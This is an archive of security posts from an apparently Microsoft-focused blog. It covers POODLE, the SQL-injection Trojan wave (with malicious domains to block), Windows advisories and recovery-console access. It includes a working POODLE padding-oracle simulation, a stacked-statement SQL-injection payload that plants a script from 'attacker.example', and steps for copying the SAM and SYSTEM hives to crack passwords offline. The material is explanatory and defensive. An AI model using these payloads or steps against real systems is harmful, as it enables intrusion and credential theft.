
You are currently browsing the archives for the Security category.

Disclaimer

Let it be known, long and far across all distant lands. This blog is totally independent from Microsoft and any other company or organisation, and this blog (not the people) is not affiliated with Microsoft at all.

Users of Wi-Fi hotspots have been warned about the “Poodle” attack, a flaw in a protocol that every major browser still supports, which lets an attacker on the same network decrypt pieces of HTTPS traffic (such as session cookies) and so hijack web sessions and transactions, The Straits Times reported today.

Poodle, or Padding Oracle On Downgraded Legacy Encryption, exploits Secure Sockets Layer version 3 (SSLv3), an obsolete protocol that is still one of those used to secure Internet traffic, the Singapore daily said.

All major browsers, from Google Chrome to Mozilla Firefox, still support SSLv3, and they fall back to it when a TLS handshake fails, which is exactly what an attacker sitting in the network path (on a shared hotspot, for example) can arrange.

An attacker who recovers a session cookie this way can take over the victim's logged-in session on an online banking or email site, even though the connection is “secured” by HTTPS. The flaw was reported by Google employees Bodo Möller, Thai Duong and Krzysztof Kotowicz in a paper published on Thursday.

The Poodle attack relies on two facts: most web servers and browsers still accept the “ancient” SSLv3, and SSLv3's CBC cipher suites do not cover the padding bytes with the MAC, so a server that checks only the final length byte acts as a padding oracle. An attacker-controlled script in the victim's browser sends many requests, tampers with each encrypted record in transit, and every record the server accepts leaks one plaintext byte; on average about 256 requests are needed per byte. The fix is to disable SSLv3 on both servers and browsers; where a fallback must be kept, the TLS_FALLBACK_SCSV signalling value proposed in the same paper stops an attacker from forcing the downgrade.
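To make the oracle concrete, here is an added simulation written for this page; it is not code from the paper or the news report. It uses a toy 16-byte Feistel cipher in place of AES and HMAC-SHA1 in place of SSLv3's own MAC; the cookie, the request shape and the server are all constructed for the example. What it shows is the real mechanism: the victim's browser is made to send requests whose MAC and padding end on a block boundary, the attacker swaps the final (all-padding) block for the ciphertext block holding a cookie byte, and every acceptance by an SSLv3-style server, which checks only the padding length byte, reveals one plaintext byte. The same forged records are rejected by a TLS 1.0-style check of every padding byte. Forcing the downgrade itself is not simulated.

```python
import hashlib
import hmac
import os

BLOCK = 16            # block size of the toy cipher (same as AES)
MAC_LEN = 20          # SHA-1-sized MAC, as in SSLv3 suites with SHA
PAD_FULL = BLOCK - 1  # length byte of a full block of padding

# Session secrets shared by victim and server, unknown to the attacker.
_ENC_KEY = os.urandom(16)
_MAC_KEY = os.urandom(16)
COOKIE = b"session=POODLE-DEMO"   # constructed secret the attacker is after


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    """Toy 4-round Feistel cipher standing in for AES; only invertibility matters."""
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def sslv3_seal(data):
    """Victim side: MAC, then pad, then encrypt. SSLv3 padding bytes are arbitrary;
    only the final byte (the padding length) carries meaning."""
    mac = hmac.new(_MAC_KEY, data, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - (len(data) + MAC_LEN) % BLOCK
    padding = os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(_ENC_KEY, iv, data + mac + padding)

def server_accepts(iv, ct, strict_padding=False):
    """Server side. SSLv3 (strict_padding=False) checks only the length byte, so any
    last block whose final byte decrypts to 15 passes: that is the oracle.
    TLS 1.0 (strict_padding=True) also requires every padding byte to equal the length."""
    pt = cbc_decrypt(_ENC_KEY, iv, ct)
    pad_len = pt[-1]
    if pad_len > BLOCK - 1:
        return False
    if strict_padding and any(b != pad_len for b in pt[-1 - pad_len:-1]):
        return False
    body = pt[:len(pt) - pad_len - 1]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(hmac.new(_MAC_KEY, data, hashlib.sha1).digest(), mac)

def victim_request(prefix_len, suffix_len):
    """The attacker's script makes the browser send a request whose path length
    (prefix) and body length (suffix) it controls; the browser appends the cookie."""
    data = b"P" * prefix_len + COOKIE + b"S" * suffix_len
    return sslv3_seal(data)

def poodle_recover(cookie_len, strict_padding=False, max_tries=8192):
    """Recover the cookie byte by byte; about 256 requests per byte on average.
    Returns (recovered_bytes, requests_sent)."""
    recovered, requests = bytearray(), 0
    for k in range(cookie_len):
        i = k // BLOCK + 1                        # block i ends with cookie[k]
        prefix_len = BLOCK * i + BLOCK - 1 - k
        suffix_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK  # padding = whole block
        for _ in range(max_tries):
            iv, ct = victim_request(prefix_len, suffix_len)
            requests += 1
            blocks = [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
            forged = b"".join(blocks[:-1]) + blocks[i]   # padding block replaced by C_i
            if server_accepts(iv, forged, strict_padding):
                # Accepted means D(C_i)[15] ^ C_{n-1}[15] == 15, so
                # P_i[15] = D(C_i)[15] ^ C_{i-1}[15] = 15 ^ C_{n-1}[15] ^ C_{i-1}[15].
                recovered.append(PAD_FULL ^ blocks[-2][-1] ^ blocks[i - 1][-1])
                break
        else:
            break   # no acceptance within budget (what a strict padding check produces)
    return bytes(recovered), requests
```

Run `poodle_recover(len(COOKIE))` and the full cookie comes back after a few thousand simulated requests; run it with `strict_padding=True` and nothing is recovered, because a forged last block must now decrypt to sixteen identical bytes rather than one.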

BitLocker was introduced while Vista was in the works, and it became one of Microsoft's key features for pushing Windows Vista to corporate customers.

For those who don't know what BitLocker is: BitLocker is a drive encryption technology from Microsoft. Unlike EFS (Encrypting File System), which encrypts individual files, BitLocker encrypts the entire disk, volume or partition, so the OS and data files are all encrypted.

If you need full disk encryption but don't have the $$$ for a Windows Vista edition that includes BitLocker (Ultimate or Enterprise), introducing TrueCrypt 6.

TrueCrypt 6 does full disk encryption just like BitLocker, but it can do more than BitLocker (sorry Microsoft!). Depending on the password you enter at boot, TrueCrypt loads the operating system that password corresponds to. So if you are being “knife-pointed” and asked for your OS password, you can give the thief/attacker the password that loads a not-so-important decoy operating system while the hidden one stays invisible. Savvy? One caveat: the decoy only protects you if it looks genuinely used, so boot into it now and then.

Creating a volume in TrueCrypt

So how is it better/worse than Bitlocker? Here is my breakdown:

Pros of TrueCrypt:

– Much more flexible, with far more options. BitLocker: a simple, straightforward wizard and little to tune.
– A different password can boot a different OS. BitLocker: protects only one OS, and gets awkward if two or more OSes need protecting.
– The cipher and hash can be chosen. BitLocker: Microsoft sets the encryption for you.
– Volumes can be protected and hidden (hidden volumes). BitLocker: not supported.

Yep… it's still going, and it's worse than ever it seems. Hundreds of thousands of unsuspecting people are still stumbling across perfectly legitimate websites that have been compromised through SQL injection, and as a result are infected with a nasty Trojan.
These Trojans are known for changing an affected system's local DNS and Internet browser settings, thus exposing the system to even more potential threats. (Trend Micro has written a very good post explaining what happens once infected.)

Therefore I thought I would take some time to mention a few domains (courtesy of F-Secure) admins should block to avoid any possible chance of infection:

yl18.net

www.bluell.cn

www.kisswow.com.cn

www.ririwow.cn

winzipices.cn

www.wowgm1.cn

www.killwow1.cn

www.wowyeye.cn

vb008.cn

9i5t.cn

computershello.cn

This is a good time to again mention that this is not a vulnerability in Microsoft IIS or Microsoft SQL Server that is used to make this happen. If you are an administrator of a website that uses ASP/ASP.NET, you should make sure that you validate all inputs and pass them to the database as query parameters rather than concatenating them into the SQL text; SQL Server happily runs a whole batch of statements, which is how a single query-string value ends up rewriting every row in the content tables.

There are many articles on how to do this, such as this one. You could also have a look at URLScan, which provides an easy way to filter this particular attack based on the length of the QueryString; that stops the long encoded payload used in these mass injections, but it is a stopgap, not a substitute for fixing the code.
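The pattern behind these compromises, and the fix, in an added example written for this page (not the code of any affected site or of URLScan). It uses Python's sqlite3 as a stand-in database: SQL Server executes a batch of statements in one round trip, which `executescript` emulates, and SQLite concatenates strings with `||` where SQL Server uses `+`. The table, the query strings and the placeholder host `attacker.example` are all constructed; the injected tag deliberately does not point at any of the domains listed above.

```python
import sqlite3
from urllib.parse import parse_qs, quote

# Constructed for this example: the tag the attacker appends to every content row.
SCRIPT_TAG = '<script src="http://attacker.example/x.js"></script>'
# Stacked statement: the first value satisfies the WHERE clause, the second
# statement rewrites the whole table. (|| is SQLite's string concatenation.)
PAYLOAD = "1;UPDATE news SET body = body || '" + SCRIPT_TAG + "'"
MALICIOUS_QUERY = "id=" + quote(PAYLOAD)          # as it would appear after the ? in the URL
MAX_QUERY_STRING = 256                            # URLScan-style cap; value chosen for the example


def make_db():
    """A tiny content table such as a compromised ASP site might serve."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news (title, body) VALUES ('Welcome', 'Hello world');
        INSERT INTO news (title, body) VALUES ('Downloads', 'Get the tool here');
    """)
    return db

def site_content(db):
    """What every visitor receives: the article bodies, rendered into pages."""
    return db.execute("SELECT title, body FROM news ORDER BY id").fetchall()

def vulnerable_handler(db, query_string):
    """Classic ASP pattern: the id parameter is pasted straight into the SQL text
    (the equivalent of conn.Execute("... WHERE id = " & Request.QueryString("id"))).
    executescript stands in for SQL Server running the whole text as one batch,
    so the attacker's appended UPDATE runs too."""
    news_id = parse_qs(query_string).get("id", [""])[0]
    sql = "SELECT title, body FROM news WHERE id = " + news_id
    db.executescript(sql)

def safe_handler(db, query_string):
    """Hardened version: validate the parameter, then bind it. The driver sends the
    value as data, so nothing in it can ever become SQL."""
    news_id = parse_qs(query_string).get("id", [""])[0]
    if not news_id.isdigit():
        return []                     # reject anything that is not a plain integer id
    return db.execute("SELECT title, body FROM news WHERE id = ?",
                      (int(news_id),)).fetchall()

def urlscan_like_reject(query_string, limit=MAX_QUERY_STRING):
    """URLScan's MaxQueryString idea. It catches the long hex-encoded batches used
    in the mass injections but not a short hand-written payload, which is why it
    is only a stopgap."""
    return len(query_string) > limit
```

Feed `MALICIOUS_QUERY` to `vulnerable_handler` and every row in `site_content` gains the script tag; feed it to `safe_handler` and the request is simply refused, with the table untouched. Note that the short payload above is well under the length cap, so URLScan alone would have let it through.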

After investigating public reports, Microsoft has published Microsoft Security Advisory 951306, which describes a vulnerability that affects multiple versions of Windows (including Windows XP Professional Service Pack 2, all supported versions and editions of Windows Server 2003, Windows Vista, Windows Vista Service Pack 1, and Windows Server 2008).

The newly found security flaw could potentially allow a malicious local user (one who is already authenticated) to execute specially crafted code and raise his privilege level to LocalSystem. IIS and SQL Server are the main attack vectors, but other vectors are possible, such as Microsoft Distributed Transaction Coordinator (MSDTC) on Windows Server 2003.

The vulnerability basically allows any process that holds SeImpersonatePrivilege to execute some code and impersonate LocalSystem (which carries the NT AUTHORITY\SYSTEM SID and a wealth of privileges in its token). On Windows Server 2003 and later, that privilege is granted by default to the Network Service, Local Service and Local System accounts and to Administrators. On Vista/Server 2008 you additionally won't hold the privilege unless you have elevated. That fortunately reduces the scope of this otherwise highly serious vulnerability, though it still isn't pretty: code running under a service account, which is exactly what IIS worker processes and SQL Server do, can step up to SYSTEM.

It must be noted, however, that Microsoft stated in its advisory that “Hosting providers may be at increased risk from this elevation of privilege vulnerability.” No exploitation had been observed at the time. Microsoft Security Advisory 951306

One of my favorite documents for Windows Server 2003 is now available in beta form for Windows Server 2008. If you have never reviewed these guides I strongly recommend them. The guide makes it easy to tailor the security configuration to the needs of your organization. There is also a really cool GPOAccelerator (Group Policy Object Accelerator) tool to help you rapidly set up, test and deploy configurations of Group Policy security settings. Here are some of the resources for the Windows Server 2008 Security Guide:

Microsoft's Windows Live SkyDrive (formerly Windows Live Folders) launched its public beta late last year. It is an online storage service for sharing files and links… and NOW it's also an online repository for spammers to host links to their electronic junk mail.

The service lets you save information online for personal use; share information with select people based on their Live ID, with either read or contributor permissions; and make content available to anyone via web links. The Live SkyDrive interface is simple and intuitive, and the service currently enforces a 1GB limit.

Of late, spammers have been abusing this service by taking advantage of a loophole (of sorts) within the SkyDrive system itself. So how do they do it?

So what makes services like these worth abusing and attractive to spammers?

Unique urls

Domains relatively safe from blacklisting

Link longevity

Abuse-handling issues

Features – host *almost anything*

Great Price

Someone else pays the hosting costs

Usually spammers use compromised servers in foreign countries or botnets to send out their spam. Using file-sharing sites (such as SkyDrive) to host the payload is not the newest trick in the book either; this one just got hit hard and suddenly.

Another interesting point: the number of times we trapped each URL was interestingly low for such a big campaign; I'd therefore estimate they had tens of thousands of files uploaded. (McAfee Weblog)

Microsoft has come to the party, however, and is beginning to shut down these malicious SkyDrive accounts (some 24 hours after they started), replacing the old malicious files with SkyDrive welcome notes, as seen here.

Yet another instance of “if it's free and worth abusing, discovery time is the only variable these days.”

As good as the recovery console in Windows is, it really isn't that secure at all. Did you know that the Command Prompt tool found in Vista's System Recovery Options doesn't require a user name or password? And that the Command Prompt provides Administrator-level access to the hard drive? For multiple versions of Windows? All you need is a Vista install DVD and you're all set to go.

Just boot from the DVD and select the Repair option:

Then select the Command Prompt:

Here you have full access to this computer, not only as an administrator but as the SYSTEM account. After this you can insert a USB stick and copy any non-encrypted file from the computer to it, stealing information without leaving any trace on the system or in the Event Viewer logs, because the installed Windows never ran. You could also, for example, copy the SAM file (it holds the local user names and password hashes) from C:\Windows\System32\config to the USB stick, along with the SYSTEM hive from the same folder (which holds the key protecting those hashes), and start cracking the computer's user passwords on another machine.

A cracker can:
1. copy files from the hard disk to USB, floppy or a network server
2. create, modify or delete files and folders
3. use most of the MS-DOS-like commands
4. use this method against Vista, XP and Windows 200x

To protect your computer or workstation, try to:

set the BIOS boot order so that booting from any medium other than the hard disk is not possible

set a startup password in your BIOS (mainly on home computers)

use hard disk encryption software, if possible (such as BitLocker); an attacker who boots from other media then sees only ciphertext

encrypt files and folders using EFS if the mechanisms above are not possible; EFS keys are protected by the user's logon password, so an offline attacker still has to crack that password first

This kind of reminds you of a Windows XP Home feature. The Administrator account password for XP Home is blank by default and the account is hidden in Normal Mode. But if you press F8 during boot for Safe Mode, you can log on to the Administrator account and have complete access to the computer.

Due to a stack-based buffer overrun in the Windows DNS Server's remote procedure call (RPC) interface, attackers can send an RPC packet to the interface and run malicious code on the system. This vulnerability could allow a criminal to run code in the security context of the Domain Name System Server service in Microsoft Windows 2000 Server Service Pack 4, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2, which by default runs as Local SYSTEM.

Users are encouraged to follow Microsoft's “Protect Your PC” guidance of enabling a firewall, applying all security updates and installing anti-virus and anti-spyware software to help minimise the possibility of a successful attack.

Microsoft is also urging customers to disable remote management over RPC for DNS servers through a registry setting (a DWORD named RpcProtocol set to 4 under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, followed by a restart of the DNS service), to block unsolicited inbound traffic on ports 1024 to 5000 at the perimeter firewall, and to enable advanced TCP/IP filtering. These act as workarounds that stop attackers exploiting this vulnerability until the update is installed. Bear in mind that 1024 to 5000 is the dynamic RPC port range, so blocking it will affect other RPC services on the same hosts as well.

As discussed in our previous blog, this update was released earlier than the usual second-Tuesday monthly security release because of the alarming increase in malware and sites exploiting the ANI vulnerability. Please make sure you install this security update right now!

Update: when you install the patch on a computer with a Realtek audio card you might get an error message saying “Rthdcpl.exe – Illegal System DLL Relocation”. Microsoft has released a hotfix for this, so if you have this problem you can download the fix here.

Microsoft's January patches are now out. The update includes three critical patches that fix flaws in Excel, Outlook, and Internet Explorer. All of these allow remote code execution and can be used as a vector for virus or Trojan attacks.

At the moment, anti-virus vendors such as F-Secure haven't seen malware taking advantage of these vulnerabilities.

Microsoft has acknowledged on its Security Blog that a new 0-day exploit is public and that the proof-of-concept code announced for it is valid.

The proof-of-concept code targets CSRSS (the Client/Server Runtime Subsystem), the part of Windows that launches and closes applications; the flaw affects all versions of Windows including the not-yet-released Windows Vista.
Tested on XP Service Pack 2, the proof-of-concept will crash the computer, resulting in a system lockup, a system failure (Blue Screen of Death), or a plain hard reboot.

Microsoft's Security Response Center said today: “Initial indications are that in order for the attack to be successful, the attacker must already have authenticated access to the target system. Of course these are preliminary findings and we have activated our emergency response process involving a multitude of folks who are investigating the issue in depth to determine the full scope and potential impact to Microsoft's customers.”

This is good news for users, as a patch is coming. The potential for attack, rated “less critical” by Secunia, is still problematic if the system is already infected by rootkits or by applications designed to allow remote access to a PC, since those give the attacker the local foothold the exploit needs. The method of attack, and the way this exploit works, means there is no real protection for end users other than to ensure you are fully patched and that your malware, spyware and virus scanning software is running and up to date.

Windows XP SP2 update KB917021 was published on October 17th 2006. What's that, you say?

It's an update to “help prevent the Windows wireless client from advertising the wireless networks in its preferred networks list”. Those of you who travel with confidential information might want to investigate this patch. It wasn't included in Microsoft's monthly updates.

Advertising the names of your preferred networks creates the potential for a man-in-the-middle attack: anyone listening learns the SSIDs your notebook will happily join and can stand up an access point with one of those names. This patch won't stop your Windows notebook from using a spoofed network, but it will fix things so that the attacker has to guess the name.

This update is in addition to the ones released on Tuesday, which fixed several code execution vulnerabilities. The December update does not, however, include a patch for the recently discovered Word vulnerabilities.

Well… probably anyway. Not all “viruses” are actually viruses, you know; a lot of anti-virus suites pick up certain bits of code which could cause damage and take the necessary precautions, such as deleting the file or quarantining it. Sometimes JavaScript code can be seen as damaging, which is unfortunate, as all it wants to do is make something better for the user, and I believe that's what has happened in the case of Gmail.

I don't use Gmail – I'm a Windows Live Mail user (but of course…) and only use Gmail for competitor reviewing and suchlike for my work. I logged in today and to my surprise Windows Live OneCare jumped in and told me it had detected a virus… actually on the main Gmail page, after I entered my credentials.


To me, this says that Windows Live OneCare is incredibly good at picking up even the smallest threats (even when one might not be a threat at all), and that Gmail has unstable or insecure code. On the other hand, it says that Windows Live OneCare is too damn picky about what is a threat and what isn't… and that Gmail has unstable or insecure code 😉

Apple Support has a very interesting notice available today. It seems that some of the iPod (video) units available for purchase from September 12th contain the RavMonE.exe virus. More details are available from: http://www.apple.com/support/windowsvirus/.

Also of interest is Apple's framing of this support issue. Note that the notice is located in a sub-folder named “WindowsVirus” rather than “virus”. In fact, the words “Windows Virus” appear eight times while the name of the virus, RavMonE.exe, is mentioned only twice. Let's be clear: some Apple iPods have shipped carrying a Windows worm that spreads through mass storage devices, which is why plugging the iPod into a PC is enough to infect it. So it might not be a Mac OS or an iPod issue. But this is an Apple issue, not just a Windows one.

“Small number”, “less than 1%”, “less than 25”, and “easily restore” are also mentioned frequently in the notice. With more than eight million iPods shipped in Apple's third quarter, we would be interested in a raw number for that 1% affected by this. What's one percent of a few million?

From the notice: “As you might imagine, we are upset at Windows for not being more hardy against such viruses, and even more upset with ourselves for not catching it.” Whom do you think the people that bought those iPods will be more upset with? It's just another little ploy to sell Apple computers.